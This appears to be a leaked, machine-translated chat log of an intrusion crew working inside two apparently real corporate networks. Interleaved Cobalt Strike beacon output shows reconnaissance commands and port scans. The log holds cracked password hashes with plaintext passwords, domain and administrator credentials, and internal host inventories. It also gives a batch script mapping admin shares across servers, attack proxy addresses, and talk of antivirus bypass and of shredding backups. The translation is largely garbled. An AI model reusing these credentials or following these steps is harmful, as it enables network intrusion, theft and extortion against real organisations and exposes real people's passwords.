OK Z: \89.0.10.104\Documents Microsoft Windows Network
The command completed successfully.
``Do you have access to the balloon view?
Teemo[WINDC2]SYSTEM */4284|2020Dec25 00:29:28> shell net view \89.0.10.104 /all
[*] Tasked beacon to run: net view \\89.0.10.104 /all
[+] host called home, sent: 58 bytes
[+] received output:
Shared resources at \89.0.10.104
nas-D5-E2-B8
Share name Type Used as Comment
-------------------------------------------------------------------------------
Documents Disk Document folder
IPC$ IPC IPC Service ("nas-D5-E2-B8")
Music Disk Music folder
Pictures Disk Picture folder
Videos Disk Video folder
The command completed successfully.
``no viv nasa or what ?``and give net view \\hosdt /all can't find anything related to nasomnu how are you doing ?``I found another trust ``gaproc.us.alloypolymers.com`` but it is not availablesolidlydethey so successfully all on kmd5 passed ?
fc525c9683e8fe067095ba2ddc971889 Passw0rd!
7facdc498ed1680c4fd1448319a8c04f Password1!
876c802a60e4623dae480bf75d215bbc 11dchamh
083c3829383f6ce4bd61ee1135fa14cf qcqcqc1
``Check the @tl1`` Credits
winona.rtpco.local
Administrator c5cd921bd3aaaad70c0ee9e14bfe096c
dch 876c802a60e4623dae480bf75d215bbc
DEPCON 083c3829383f6ce4bd61ee1135fa14cf
``````
rtpco.local
Administrator 544599e93b8ab30d2a53ec48ce7ca6da
arobinsona fc525c9683e8fe067095ba2ddc971889 (Installed by many users)
cancelet 8669993c0b6f8d65cd206a0c9e1d598b
kaseyaservice d4e06b1ecf49e3d7932fba37fc6e96d5
O365Service 7facdc498ed1680c4fd1448319a8c04f
sagert 86517550f7c701dbb1f28f23a39fad9b
spicescan ca1484e694d5ca64dd6b59e3510d7f73
``good night''
7259ade8efc785abb4043e171e06b9c6 300SpartanS
88781646e2a2399370c54bae7f790e58 @d0nix
b4712f346339be917d4d9fe2ce3c387c barracuda
5acd3ae4a25e042cb01513ea9104b598 Barracuda
f97f8542534b19414d871e197d222747 Gutch@!!
960736ab56cfa8943d4de07ef142a730 boston
ae8e27dc85a2682037008ebe671655f0 afdljplw
b6c367027c0d73a755244ad52bda9a67 !nC0rr3ct
6c77565149af62e68bb41868d29ec47a d0n3g0n3
e9b57eb8af25befb91bda9b4ed95097c 11Saundra
a99a74eb78fc1f1ea3a89b53b7de7179 p@perm00n
b4712f346339be917d4d9fe2ce3c387c barracuda
26e7f39a25b859023e876293c37495e3 D33pw@ter
4df7f5cc8377559b058c30516ca88a30 sub@sh2005
06ee9928c5ebc952e0fc44e300ff821f c]st0m3r
5f6e5864d8622c481a233d9472f1b3a8 Gahann@
652805d304727fa73d6c4c7cfef31986 Calib3r9
``Till tomorrow''.
Administrator 66ac9a770e02cfdded6d5bd957a774fb
Angel 7259ade8efc785abb4043e171e06b9c6
adonixadmin 88781646e2a2399370c54bae7f790e58
alloyamms ab6be57f8c4cc213e70158f87953f45a
barracuda b4712f346339be917d4d9fe2ce3c387c
BarracudaBUP 5acd3ae4a25e042cb01513ea9104b598
bbuerck f97f8542534b19414d871e197d222747
BGW 960736ab56cfa8943d4de07ef142a730
CAncelet ae8e27dc85a2682037008ebe671655f0
canceleta b6c367027c0d73a755244ad52bda9a67
cevansa 6c77565149af62e68bb41868d29ec47a
citrix_svc 66ac9a770e02cfdded6d5bd957a774fb
DHaase e9b57eb8af25befb91bda9b4ed95097c
EntAdmin a99a74eb78fc1f1ea3a89b53b7de7179
gahbarracuda b4712f346339be917d4d9fe2ce3c387c
orgbarracuda 26e7f39a25b859023e876293c37495e3
sagert 86517550f7c701dbb1f28f23a39fad9b
Services_Backup 4df7f5cc8377559b058c30516ca88a30
Uptime 06ee9928c5ebc952e0fc44e300ff821f
veeam 5f6e5864d8622c481a233d9472f1b3a8
wstangea 652805d304727fa73d6c4c7cfef31986
The ``dropsession files in slipk 6okay then on tomorrow roll there logins(mail), with clears what is there([ ](https://mediaeveryone.com/group/rtpcompany-com?msg=eypQF6sQrBzHzsJKD) mail sootv from hell, or login accountswith @tl1 when we worked at ART for a long time, probably a good half of critical accesses from e-mails that were not on machines there and network diagrams and instructions on connections and keys and passwords e-mail is a treasure of information in many companies, he had to go under a proxy on the ADR to be routed to mycr and authorize there, and very often he flies through the mail to the microsoft site. Do you think he who passed the data on the posta here? there either the pass does not fit, or not created a box, or an empty mail, not a word about us and the ip and the hostname? in the mail all the clerks checked - empty you scan on subdomains `` ``
Subdomain IP address OS Server Technology Web Platform Page Title
autodiscover.rtpcompany.com 52.97.170.40 Sign in to Outlook
sip.rtpcompany.com 52.112.65.203 RTC 7.0
dns2.rtpcompany.com 63.219.151.12
vpn2.rtpcompany.com 64.213.220.250
ssl.rtpcompany.com 65.162.42.135
vpn.rtpcompany.com 65.162.42.173
wiki.rtpcompany.com 65.162.42.180
mail.rtpcompany.com 65.162.42.195 Windows Microsoft-IIS 7.5 ASP.NET 4.0.30319 IMail Web Client - Login
mailhost.rtpcompany.com 65.162.42.195 Windows Microsoft-IIS 7.5 ASP.NET 4.0.30319 IMail Web Client - Login
pop3.rtpcompany.com 65.162.42.195 Windows Microsoft-IIS 7.5 ASP.NET 4.0.30319 IMail Web Client - Login
smtp.rtpcompany.com 65.162.42.195 Windows Microsoft-IIS 7.5 ASP.NET 4.0.30319 IMail Web Client - Login
ts.rtpcompany.com 65.162.42.198
exchange.rtpcompany.com 65.162.42.204 Windows Microsoft-IIS 10.0 ASP.NET 4.0.30319 Outlook
search.rtpcompany.com 65.162.42.204 Windows Microsoft-IIS 10.0 ASP.NET 4.0.30319 Outlook
webmail.rtpcompany.com 65.162.42.204 Windows Microsoft-IIS 10.0 ASP.NET 4.0.30319 Outlook
docs.rtpcompany.com 65.162.42.206 Windows Microsoft-IIS 7.5 ASP.NET IIS7
citrix.rtpcompany.com 65.162.42.222 Windows Microsoft-IIS 7.5 ASP.NET
web1.rtpcompany.com 65.162.42.241
beta.rtpcompany.com 65.162.42.241
asia.rtpcompany.com 65.162.42.246
dns4.rtpcompany.com 65.162.42.249
rtpcompany.com 65.162.42.250 PHP WordPress 5.6 RTP Company
web.rtpcompany.com 65.162.42.250
ftp.rtpcompany.com 65.162.42.250 PHP WordPress 5.6 RTP Company
home.rtpcompany.com 65.162.42.251 Windows Microsoft-IIS 7.5 ASP.NET 4.0.30319
public.rtpcompany.com 65.162.42.252 Windows Microsoft-IIS 7.5 ASP.NET public.rtpcompany.com
www.rtpcompany.com 167.71.108.192 PHP WordPress 5.6 RTP Company
fr.rtpcompany.com 204.248.115.14
es.rtpcompany.com 204.248.115.14
dns.rtpcompany.com 205.243.114.218
dns3.rtpcompany.com 208.94.147.135
data.rtpcompany.com 216.252.195.128 Windows Microsoft-IIS 7.5 ASP.NET 2.0.50727 Advanced Materials Search by Property, Composition, or Text
``[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=nA3hZ2RS3fYvk3hP9) I'm just afraid to use it, after the obvious errors of other tools) throw the hashes of all YES quickly run them through kmd5sobot kredes domain
https://webmail.rtpcompany.com/owa/auth/logon.aspx
``alternative
https://exchange.rtpcompany.com/owa/auth/logon.aspx
``above mistake once disassemble the tool and we will be happy with the search of all mail@tl1 please, with mailsnapper dig `mail.rtpcompany.com ``rtpcompany.comThe computers that I came across offnut, I ngdeto seen a link to the domain mail, it must be found.
After that, I'll try to connectwhy not get a quick look now a quick look not to get into tomorrow during office hours did not look therepasswordpochtu? I think so yes it first did just in case)but google default root pass to port 22 for ReadyNAS hardly anyone goes there at all on ssh just bros, this is not a full-fledged lin
it's a nixlike system for haaS if there's only lin backups then just shred the server into zeros and fuck it
delete
lin don't get lost
```
Why can't i break it? just open the smb balloon and break it as you please. go through all available usernames, passwords + all vulnerabilities from the msf - no point in moving it to tomorrow? to try to find the data i need to check every arm and servicecloud. That's a long time.
89.0.1.6:445 (platform: 500 version: 5.0 name: MAINT domain: WORKGROUP)
http://89.0.1.6/rtp/index.cfm
``````
Teemo[23L1]TOM/3608|2020Dec24 06:00:28> shell nslookup 89.0.10.104
[*] Tasked beacon to run: nslookup 89.0.10.104
[+] host called home, sent: 51 bytes
[+] received output:
Server: mndc2.rtpco.local
Address: 89.0.0.83
Name: nas-D5-E2-B8.rtpco.local
Address: 89.0.10.104
``````
URL : https://kaseya.rtpcompany.com/vsapres/web20/core/login.aspx
Username : tom
Password : Passw0rd!
``Isn't the ip or hostname glowing in the admins' browsers?
[+] received output:
89.0.10.104:22 (SSH-2.0-OpenSSH_6.7p1-hpn14v5 Debian-5+deb8u7.netgear1)
Did you look for access? No, not in any domain ad users do not have geodunase if there is no files on the pc, maybe they did a search on NASnet/ And read the mail of admins?) Guys, we will search for a long time))) Give me a screenshot of the web admin
WINONA\TOM abcabc4
RTPCO\corr 00sthomas
RTPCO\pvcimpro 4qbuyh
RTPCO\rmiller 789)_+rm
RTPCO\dpflughoeft BabyYoda123
rtpco\administrator d0T73Rd!
WINONA\Administrator DA7PaM8h
DEPCONSG/administrator dropC
AXREMOTESRV\Administrator dropCod5
RTPCO\npaine Jsnp&524
WINONA\rmiller michael1
WINONA Color Plastics1
rtpco\bkouba PrayersNeeded2020!
RTPCO\lmiller Ronnie11
``Not wind?
beacon> portscan 89.0.10.104 1-10000 icmp 200
[*] Tasked beacon to scan ports 1-10000 on 89.0.10.104
[+] host called home, sent: 75365 bytes
[+] received output:
(ICMP) Target '89.0.10.104' is alive. [read 8 bytes]
89.0.10.104:10000
[+] received output:
89.0.10.104:8200
[+] received output:
89.0.10.104:5355
[+] received output:
89.0.10.104:3702
[+] received output:
89.0.10.104:443
[+] received output:
89.0.10.104:139
89.0.10.104:80
[+] received output:
89.0.10.104:22 (SSH-2.0-OpenSSH_6.7p1-hpn14v5 Debian-5+deb8u7.netgear1)
[+] received output:
89.0.10.104:445 (platform: 500 version: 6.1 name: NAS-D5-E2-B8 domain: WORKGROUP)
Scanner module is complete
Portscan in progressDefault combinations do not fitNow give portscanYou guys do not read the messages When do we start pulling? What will pull the servers to divide among themselves You decide what to do there?[ ](https://mediaeveryone.com/group/alloypolymers-com?msg=abZxmjF9E8zPF4rJL) and this[ ](https://mediaeveryone.com/group/alloypolymers-com?msg=rWw6TTnNd5ZKh7yGQ) took this [ ] (platform: 500 version: 6.1 name: NAS-D5-E2-B8 domain: WORKGROUP)
didn't come up YES LA as local admins
```
no access to folders on the NAS or did you try to authorize? no on the PC admins watched the rg files? re-checked all the Administrator did not fit YES LA as local admins and check the webcards YES / default for this NASa if no access - then log on 80/443 try to strange question))) lock it need)) access that is it? LA or DA some? @tl2 what do we do with us? 1) We are not broken into groups of servers
2) We're in the vorgsteins.
us.alloypolymers.com SERVER
ALLOYLICWEB: 10.1.1.238
ALLOYAPP3: 10.1.1.250
RICHMONDDC1: 10.1.1.248
RICHMONDDC2: 10.1.1.247
ALLOYAMMS: 10.1.1.231
GAH2K3SRV1: 10.1.10.40
GAHDC2: 10.1.10.81
ALLOYCRKT01: 10.1.5.250
CROCKETTDC1: 10.1.5.241
ALLOYORGAPP01: 10.1.8.11
ALLOYEXCH02: 10.1.1.240
ORANGEDC1: 10.1.8.248
ALLOYSQL01: 10.1.1.243
ALLOYXENAPP: 10.1.1.237
ALLOYAPP01: 10.1.1.251
RICHMONDSTORAGE: 10.1.1.245
OHPRINTSRV: 10.1.10.12
OHSPICEWORKS: 10.1.10.11
CROCKETTSTORAGE: 10.1.5.242
ALLOYWEB2: 10.1.8.210
GAHDC01: 10.1.10.82
ORANGESTORAGE: 10.1.8.245
ORGPRINTSRV: 10.1.8.246
CTXALLOYCONNECT: 10.1.1.221
``Just one more time, the avs have decided to bypass the inject all ready?
rtpco.local SERV
AXBATCH-TEST: 10.89.11.112
WINONAV1: 10.89.11.22
AXAOS-BUILD: 10.89.11.120
SAN-HQ: 10.89.11.35
AXDEV3: 10.89.11.103
AXDEV6: 10.89.11.106
MINITABLIC: 10.89.11.6
AXDEV1: 10.89.11.101
AXDEV2: 10.89.11.102
AXSQL-DEV: 10.89.11.118
TX-TESTSRV1: 10.58.0.166
MXSTORAGE: 10.13.0.14
SHENZDC1: 10.17.1.5
NVSTORAGE: 10.57.0.36
NEVADAHYPV1: 10.57.0.84
NVDC1: 10.57.0.32
SUZHOUDC2: 10.7.0.41
SUZHOUPRINTSRV: 10.7.0.21
SINGDC1: 10.5.0.4
SINGDC2: 10.5.0.5
SINGSTORAGE: 10.5.0.19
MNDC2: 89.0.0.81
``Yes, Captain''.
rtpco.local SERV.
CTXCONNECTOR2: 10.89.11.27
CTXCONNECTOR1: 10.89.11.26
SQLPROD1: 10.89.0.99
KASEYA: 10.89.11.24
CTXAPP3: 10.89.11.28
ONBASEPROD1: 10.89.11.7
ONBASETEST: 10.89.11.10
CTXAPP4: 10.89.11.11
ONBASETEST01: 10.89.11.33
WEBPROD01: 10.89.11.31
PDM01: 10.89.11.32
SOLARWINDS: 10.89.11.2
WINPAK01: 10.89.0.111
MAINTENANCE: 10.89.11.40
MNDC2: 89.0.0.83
STORAGEWINONA2: 10.89.11.14
AXFORMS-DEV: 10.89.11.111
EXCHANGE: 10.89.11.10
ADMT: 10.89.11.5
INDYDC1: 10.59.0.4
AXREPORTS-DEV: 10.89.11.121
AXAOS-TRAINING: 10.89.11.122
AXAOS-TEST: 10.89.11.123
``are you ready?
rtpco.local SERV
FRANCEDC1: 10.4.0.25
FRANCEDC2: 10.4.0.26
FRANCESTORAGE: 10.4.0.27
FRANCEPRINTSRV: 10.4.0.28
GERMANYDC1: 10.20.0.40
GERMANYDC2: 10.20.0.41
GERMANYSTORAGE: 10.20.0.42
FR-VIR2008-02: 10.4.0.19
FRANCESAGE: 10.4.0.100
FRANCEINTERMEC: 10.4.0.72
FRANCEARCHIVE: 10.4.0.10
DC1POLAND: 10.28.0.5
POLSTORAGE: 10.28.0.8
DC2POLAND: 10.28.0.6
MNDOMAIN6: 10.89.0.20
PV-PROD2: 10.89.0.87
PV-PROD1: 10.89.0.86
SNAP: 10.89.10.12
RTPADFS1: 89.0.0.191
VADC1: 10.56.0.30
VADC2: 10.56.0.31
CHILLER2: 10.89.10.11
VADC2: 10.56.0.35
``````
rtpco.local
25L27A: 89.0.191.55
30L107: 89.0.191.64
25L21: 172.22.200.26
BBDESK2: 89.0.192.80
26L19: 10.58.0.132
ADAM-DESKTOP: 89.0.192.87
23LL76: 89.0.192.189
UPS580: 89.0.191.216
24L11: 10.58.0.135
33LL67: 89.0.192.215
30L43: 89.0.192.45
28L4A: 89.0.192.6
27L24: 10.32.0.191
CNSZCYDGG13: 10.7.3.13
NB02B_RTPSZ: 10.17.4.40
CNSZD6RTNY02: 10.7.2.76
30L07: 89.0.191.137
TIS-RTP: 10.7.2.81
25L59: 89.0.191.46
26L47: 10.25.0.130
25L9: 89.0.191.43
25L42: 89.0.193.15
26L251: 10.32.1.188
30LL56: 89.0.191.172
32LL58: 10.58.58.91
CNSZD2M6RC3X: 10.7.2.106
DEPCON10B: 89.0.192.150
DEPCON10SG: 10.5.1.21
SG20160916-PC: 10.5.1.75
SG20190107-PC: 10.5.1.103
SUZHOU-JOLYN: 10.7.2.151
SG20140923-NB1: 10.5.1.131
30L30: 10.1.8.145
MXL5040QYD-1: 10.1.8.220
PRTMONITOR: 10.89.11.36
29LL22: 172.22.245.162
28LL50: 10.13.0.87
DEPCON10FR: 89.0.192.141
DENNIS15: 89.0.88.20
25L37: 89.0.192.47
DENNIS10: 10.33.255.253
31LL31: 89.0.203.201
30L24A: 10.1.5.208
26L14: 10.33.1.246
31LL35: 172.22.245.170
27L07: 89.0.191.57
27L09: 89.0.193.118
QATHERMAL: 89.0.191.80
CNSZN84WP433: 10.7.2.163
SG20171218-NB: 10.5.1.56
``````
rtpco.local
SG20170531-NB: 10.5.1.99
W10-FR2018-CYC: 10.4.1.13
30L75: 89.0.192.98
30L36: 10.1.8.143
26L48: 89.0.192.81
LUNCHROOM2: 89.0.6.100
28L18: 10.57.0.61
24L19: 172.22.200.18
BSDESKTOP: 89.0.10.101
23LL7: 10.12.1.7
31LL08: 172.22.200.48
USH832L0DT: 10.1.8.128
30L40: 89.0.191.147
RTP-FGY: 10.7.2.58
W10-F2014-PYBA: 10.4.1.103
29LL36: 172.22.245.170
SG20180424-PC: 10.5.1.53
26L7: 89.0.192.3
25L5: 172.22.200.62
CNSZ6K9ZJ13: 10.7.3.20
30L29: 10.1.8.157
27L28: 172.22.200.11
30L41: 89.0.191.245
25L3: 89.0.192.77
18L15: 172.22.200.11
27L06: 89.0.192.160
30L94: 10.59.0.156
30L14: 10.36.5.236
AVANITEN: 10.89.11.34
31LL42HR: 89.0.191.209
31LL19: 89.0.192.102
27L12: 10.56.0.166
26L05: 172.22.200.24
31LL36: 172.22.245.162
28L24: 10.57.0.85
28LL75: 172.22.200.29
30L54: 89.0.191.174
24L20: 172.22.245.137
RTP_SZ_ZPH: 10.17.4.14
SG2010018: 10.5.1.105
WIN7-2016-CHG: 10.28.0.100
28LL56: 89.0.192.215
30L47: 10.59.0.113
30L22: 10.1.5.151
AXUPS: 10.89.11.35
30L93: 10.59.0.106
26L59: 89.0.193.94
25L43: 172.22.200.66
30L10: 89.0.193.76
``````
rtpco.local
24L5: 10.33.2.239
30L96: 89.0.191.196
26L23: 10.58.0.156
30L65: 10.1.10.146
26L55: 10.56.0.118
SUZHOU-JANE: 10.7.2.136
28L19: 89.0.191.215
25L38: 89.0.192.172
30LL17: 89.0.203.201
22LL11: 10.33.1.254
32LL15: 89.0.203.204
26L29: 10.59.0.107
RTP_SZ_C1: 10.17.4.4
28L13: 10.57.0.63
30L59: 172.22.200.30
CNSZ6K0WJ13: 10.7.2.158
30L19: 89.0.192.127
27L14: 89.0.192.118
EQL-SAN2: 10.89.5.120
30L03: 10.36.6.234
30L51: 10.56.0.126
25L12: 89.0.193.67
METROMTRREADER: 89.0.191.183
29LL59: 89.0.203.201
30L21: 10.1.5.205
30L15: 172.22.200.16
29LL9: 10.1.8.104
30L100: 89.0.192.80
32LL62: 89.0.192.244
30L69: 89.0.192.35
VC1: 172.22.254.20
30L68: 89.0.191.58
30L98: 10.59.0.148
30L98: 10.59.0.148 30L92: 10.59.0.148 30L92: 10.89.11.3
32LL42: 89.0.192.239
CANCELET: 10.89.11.22
30LL29: 89.0.192.177
28L10: 89.0.191.39
23LL36: 172.22.200.48
26L07: 10.12.1.3
9.0.193.38
31LL40: 172.22.245.162
30L08: 10.58.0.154
32LL01: 89.0.203.201
30L85: 89.0.192.92
25L60: 89.0.193.101
26L56: 10.56.0.103
31LL22: 10.59.0.167
LTSIMBA1: 10.7.2.70
``````
rtpco.local
WININTERMEC32: 89.0.192.202
30L60: 89.0.192.78
30L44: 89.0.191.148
DCHDESKTOP: 89.0.88.18
ONBASESCAN: 10.89.11.23
GUARDSHAK: 89.0.191.99
30LL27: 10.8.1.240
DEPCON10DV: 89.0.192.142
26L15: 10.13.0.92
30L26: 10.1.5.203
28LL95: 172.22.245.137
RTP_SZ-PC1: 10.17.4.5
RTP_SZ_C: 10.17.4.22
28LL37: 172.22.245.162
W10-F2018-VIB: 10.4.1.46
ORION24: 89.0.191.71
28L16: 89.0.192.60
22L10INDY: 10.89.11.34
30L09: 10.32.1.231
26LL27: 172.22.200.11
30L102: 10.59.0.120
29LL32: 10.25.0.136
29LL57: 89.0.203.201
31LL45: 10.36.5.247
SUZHOU-ZOUWEI: 89.0.203.204
us.alloypolymers.com
USH313A07T: 10.1.5.81
MXL5040SMP: 10.1.5.38
5CG4503TXM: 10.1.5.46
GAHDC570005: 10.1.10.99
5CG5050LDQ: 10.1.10.155
MXL5040SMP-CRT: 10.1.5.43
SPICEWORKSRCH: 10.1.1.124
ALLOYHD01: 10.1.1.124
GAHHP2UA2450T7H: 10.1.10.184
2UA5032HTR: 10.1.10.120
25L51: 10.1.10.220
MXL5040QXR: 10.1.8.83
GAHELECT: 10.1.10.190
GAHWIN7HP6000: 10.1.10.226
5CG5050FL1: 10.1.8.129
U8H835L061: 10.1.8.58
25L63: 10.1.10.244
XNVR-1739997: 10.1.10.180
ORGREMOTEPW: 10.1.8.151
MXL5040QYR: 10.1.8.175
USH0360062: 10.1.10.167
26LL34: 10.1.10.196
USH539L1C1: 172.22.245.170
GAHPROD1: 10.1.10.122
LEASE25-PC: 10.1.10.185
26LL31: 10.1.10.145
``Checkbomb add /persist? If both show up, then cool add 2 hosts to this ipsa)``
@echo off
for /f %%i in (ips.txt) do (
net use * \\%%i\C$ /persistent:yes
)
```
will it do that? or off with a batko kakim through the memory can take 100 servers per kobytes which kinda does not interfere in the case of 2fa on avmomo not yet pingingada now pinging all domains? total 200 servers? dunno how much interference, I generally quietly walk on their network how much interference? hmm, not a chance to bypass the inmemt in the cloud what is the administrator's browser?
2faSphere is`winona\tom,abcabc4`setg Proxies socks4:104.243.44.69:16219setg Proxies socks4:104.243.44.69:424181
2. kaseya
3. wargroups
Name : Barracuda Orange Backup Server
URL : http://10.1.8.14/auth/signin/
Name : Barracuda Crockett Backup Server
URL : http://10.1.5.44/auth/signin/
Name : Barracuda Crockett Backup Server
URL : http://10.1.5.34/auth/signin/
Name : Barracuda Backup RCH
URL : http://10.1.1.14/auth/signin/
Name : ORG Barracuda Networks Login
URL : http://10.1.8.232/web/login?_bcsp=1&_bceq=U2FsdGVkX1_ZQKJqbA-A6J1pDS0v348lRBF4gQRaT1Oos5iW-joM_MbMEGYcdA1LafroouYOUK8fDhjDdsOT4mCUAGvUboqz-KCiF9iyFEw.
Name : CRT Barracuda Networks Login
URL : http://10.1.5.180/web/login?_bcsp=1&_bceq=U2FsdGVkX1-zFQuAcSM8y3KXKFNCE-epeWxGww7gw37-3-IbBQlsFBC_6dk77rKf2OplTxoJjBY2xSAtaA0JEgq7yd9tbiBEUiNt-wZbBYo.
``Antivirus.
Bekapyotnichat then write a list of current problems104.243.44.69:42418there's a splinter it kaseya.rtpcompany.com ``there's definitely kasper? There are some problems with kasper, is the rdp port open? The last problem? ``89.0.10.104:445 (platform: 500 version: 6.1 name: NAS-D5-E2-B8 domain: WORKGROUP)`
on us it is not possible to get to us, it's too early to close so then everything is ready to close if the cresses rolled into the sphere? the first time there? all do proxy) `https://172.22.254.20/` yes, but the stupidity of the face opened it means you came? + without /websso.... at the root, what already toputput in the sphere? for the future all - always check the test method node and ip and on the hostname` ``
vc1.rtpco.local:5580
`` vc1.rtpco.local:5480
`` vc1.rtpco.local:636
vc1.rtpco.local:514
vc1.rtpco.local:443
vc1.rtpco.local:389
vc1.rtpco.local:88
vc1.rtpco.local:80
vc1.rtpco.local:22 (SSH-2.0-OpenSSH_7.4)
The first thing is to resolve the name of the proxy and then come in proxy can not do it in dnspo ip come in...omgscan ports webane opens (when you come in what does it say?
Teemo[MNDC2]SYSTEM */7388|2020Dec24 03:09:47> shell ping vc1.rtpco.local -n 1
[*] Tasked beacon to run: ping vc1.rtpco.local -n 1
[+] host called home, sent: 56 bytes
[+] received output:
Pinging vc1.rtpco.local [172.22.254.20] with 32 bytes of data:
Reply from 172.22.254.20: bytes=32 time<1ms TTL=63
Ping statistics for 172.22.254.20:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
``this?``vc1.rtpco.local is dead
Teemo[WINDC2]SYSTEM */4284|2020Dec24 03:08:13> shell ping VMWAREMGR -n 1
[*] Tasked beacon to run: ping VMWAREMGR -n 1
[+] host called home, sent: 50 bytes
[+] received output:
Pinging VMWAREMGR.winona.rtpco.local [89.0.55.9] with 32 bytes of data:
Reply from 89.0.0.92: Destination host unreachable.
Ping statistics for 89.0.55.9:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
The ``hosts'' exist? According to the links, yes, but I can't get there + is there virtualization at all?question такойeyJhbGciOiJBFQgtWxVdSoioqX5YErUhcIWJjoVCS8e2VVd3ipHBBbQqnpYJgmIoDjGx8mG9sjMkJv8dbB8pRYcMRFtlgGuabvp7IcFoBSDikbUE6OFR7QbhdjYmKmzQ3Pi+YSzQiJWgXfzrTxiDXvVVD9yLs5HZAMx7kd+H96FWXSHBF4roPEKIu1NsQlI/ikikb5ZXZtb8Bjzu/UJsDFij6CuIv1lAkQ==eyJhbGciOiJBY7xUYEIzqDilLSDdB+KfdMuSF53iWnoIJ/eW2At2J6J6dogVGoAelC0ZeKKc1Ta08ZNVGzSxKtg71IW73duj0lO22fXmrXZ2qSduLXhB2QoSzzbdZRgTfb9O03MOCPs074EWzTy1UmUpD/CdsKmiKPOwFHZmrMWuJ1jyROhhGBPlKiE2HbrUYv5MR51TMndJ5Pqvg8pWc82dCOEzxSu7zvuKqAHjtCtfUtoDRp9pPGc=eyJhbGciOiJBjuc/q4kyD5WW6ouRR0DBmIZtGzrORNQpHRpYafG/QD4O7zW51wMQcDRM2viwOssH/aiP7j381dt+7D13Nu+KyOF8H1AT7zJe6EV2jwzYHx8JceMmY29WMnJc+M1TCUbxKZP3enTXr5k98bzVCQClqdGpfEhZW/XxvSkCNEzPf1mevDsm2QUnBwpUeipayncF5Mtaz0+ITx9xio7pLDjdD+10YbDO0uPw7LeH0RLehwore2XIQj5p7S+LuRZQ3mXreyJhbGciOiJBhJrHddRITrFEAg6bEqm7Agcz7EcoCQFkbbLRLBSEZpeiQB91QdSIyq/wrN1oFlxP4V3gczdgqBL02EuJYOa7rDmX9C59RFkvLGBrj0xae5vXkrAmTyJtdQufDH3C6x1WE1Ybn6zlHa0WAJ0QpyZD2cPAe+VUOo4AdZdnf6cenb3DPBvuIStpeCc6WD0VXLMtKsMbz7F7vLgNUlpcJo3CsZasqW05tZyCuqRcOdiyD3DCeuYOaPNc7zrNbYLy43TLbB our rocket)who's gonna get pussy for taking the initiative?)))) I'm intrigued read the main) tell me) we never get bored I'm in the course of fucking fun situation, kz))))) and who conducted the meeting I do not know ((but did not let me see anything) Target said that the set and some tests are not in the course I have not even seen themtut? you didn't happen to check the tests for new candidates? ok then i'll send them in a separate pack i'm ahtung here again but in a couple of hours i'll be taking my test soon so can you give me yours for pars?+ do not have to duplicate and you can always consult plus I write all sorts of things they fly different information interesting to work in the general channels remind me to give you tomorrow to rocket to online norton and bypass the detector I just did a test so I have no way to parry it i don't think i'm thinking too much now) it's funny how life is so fucked up when no one is thinking about anything it was like this to this day when i used to communicate with the minister i took it from someone else's cobalt long time ago so right i started noticing crooked listener in other people's cobalts
it is RIGHT to write the domain of the pad both in HTTPS hosts and in HTTPS Host (Stager)
if you write ipak from HTtps Host (Stager) - stepping goes "bypassing" SSL certificate which is on the pad - which is FUCKING and adds blocking by phasers all I see
give me the session pass
takehq.com
No hedgehog
beacon> shell dir "C:\Users\Djarden\AppData\Local\Microsoft\Edge\User Data\Default\History"
[*] Tasked beacon to run: dir "C:\Users\Djarden\AppData\Local\Microsoft\Edge\User Data\Default\History"
[+] host called home, sent: 108 bytes
[+] received output:
The system cannot find the path specified.
beacon> shell dir "C:\Users\Djarden\AppData\Local\Microsoft\Edge\User Data\Default\"
[*] Tasked beacon to run: dir "C:\Users\Djarden\AppData\Local\Microsoft\Edge\User Data\Default\"
[+] host called home, sent: 101 bytes
[+] received output:
The system cannot find the path specified.
beacon> shell dir "C:\Users\Djarden\AppData\Local\Microsoft\Edge\User Data\"
[*] Tasked beacon to run: dir "C:\Users\Djarden\AppData\Local\Microsoft\Edge\User Data\"
[+] host called home, sent: 93 bytes
[+] received output:
The system cannot find the file specified.
beacon> shell dir "C:\Users\Djarden\AppData\Local\Microsoft\Edge\"
[*] Tasked beacon to run: dir "C:\Users\Djarden\AppData\Local\Microsoft\Edge\"
[+] host called home, sent: 83 bytes
[+] received output:
Volume in drive C has no label.
Volume Serial Number is D0FC-5A15
Directory of C:\Users\Djarden\AppData\Local\Microsoft\Edge
08/05/2019 07:05 AM .
08/05/2019 07:05 AM .
0 File(s) 0 bytes
2 Dir(s) 24,238,346,240 bytes free
``at least give us a sign of life'' (no session) ``c:\users\USERNAME\AppData\Local\Microsoft\Edge\User Data\Default\History````
Directory of C:\Users\Djarden\AppData\Local\MicrosoftEdge\User\Default
01/26/2017 10:24 AM .
01/26/2017 10:24 AM .
0 File(s) 0 bytes
2 Dir(s) 24,248,209,408 bytes free
```
```
Directory of C:\Users\Djarden\AppData\Local\Microsoft\Edge
08/05/2019 07:05 AM .
08/05/2019 07:05 AM .
0 File(s) 0 bytes
2 Dir(s) 24,254,611,456 bytes free
```
```
Directory of C:\Users\Djarden\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge
02/03/2017 08:42 AM .
02/03/2017 08:42 AM .
01/26/2017 09:48 AM CortanaAssist
02/03/2017 08:42 AM Extensions
01/26/2017 09:46 AM PlayReady
01/30/2019 01:13 PM UrlBlock
01/26/2017 09:46 AM User
0 File(s) 0 bytes
7 Dir(s) 24,243,003,392 bytes free
```
```
Directory of C:\Users\Djarden\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default
04/26/2017 09:01 AM .
04/26/2017 09:01 AM .
04/26/2017 09:01 AM BrowserImport
01/15/2021 01:13 PM DataStore
01/22/2018 10:23 AM DomainSuggestions
01/26/2017 09:46 AM Favorites
01/26/2017 09:46 AM ImageStore
09/10/2020 03:38 PM RACShare
08/28/2017 01:01 PM Recovery
0 File(s) 0 bytes
9 Dir(s) 24,242,847,744 bytes free
```
```
Directory of C:\Users\Djarden\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\History
File Not Found
``Ah, yes, I switched servers
```
setg Proxies socks4:185.150.189.165:43940
